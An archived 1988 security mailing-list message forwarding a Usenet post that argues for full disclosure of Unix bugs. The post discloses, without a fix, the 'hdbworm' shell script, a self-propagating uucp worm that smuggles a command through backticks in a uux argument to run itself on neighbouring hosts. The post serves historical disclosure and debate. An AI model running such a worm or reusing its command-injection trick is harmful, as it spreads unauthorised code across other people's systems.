The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #270 [Re: ~uucp/.forward] (1 message, 1184 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/270.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: rsalz@pineapple.bbn.com
To: phage
Date: Fri 12:26:41 18/11/1988 EST
Subject: Re: ~uucp/.forward
References: [Thread Prev: 271] [Thread Next: 291] [Message Prev: 281] [Message Next: 268]

I'm sure you've all seen this, but what the heck...

I believe it is time to post information on the "rmail" hole NOW.
Path: bbn.com!bbn!mailrus!honey
From: honey@mailrus.cc.umich.edu (peter honeyman)
Newsgroups: news.sysadmin
Subject: Re: who, me?
Message-ID: <797@mailrus.cc.umich.edu>
Date: 18 Nov 88 02:51:24 GMT
References: <622@ccncsu.ColoState.EDU>
Sender: usenet@mailrus.cc.umich.edu
Reply-To: honey@citi.umich.edu (peter honeyman)
Organization: Center for Information Technology Integration, Univ of Michigan
Lines: 32

steved@longs.lance.colostate.edu objects to exposing the TIOCSTI bug to
unfriendly eyes, expressing a concern that "a few more clues and a
little imagination will yield potential disaster."

this is one school of thought, and we saw the result of this attempt at
hush-it-up-don't-say-a-word computer security.  in particular, broken
systems running sendmail learned the hard way that this policy has it's
down side.

there is another school of thought on this -- tell everyone you can
as fast as you can.  that's my alma mater.

it was in the spirit of glasnost that i posted a working program that
exploits the setpgrp bug.  (credit rtm for first discovering it.)  in
that same vein, i offer the following honey danber "experiment." (sans
fix!  if you have this bug, go bug your vendor.)

create /usr/spool/uucppublic/hdbworm as follows:

#!/bin/sh
PUBDIR=/usr/spool/uucppublic
for i in `uuname|sort -u`; do
	uucp /usr/spool/uucppublic/hdbworm $i!/usr/spool/uucppublic
	uux -a "`sh /usr/spool/uucppublic/hdbworm;echo root`" $i!false
done

i told summit about this several years ago, specifying in no uncertain
terms the gravity of the problem.  it is quite possible that they
applied the patch i sent them.  even so, i don't recommend running
hdbworm.

	peter

END OF DOCUMENT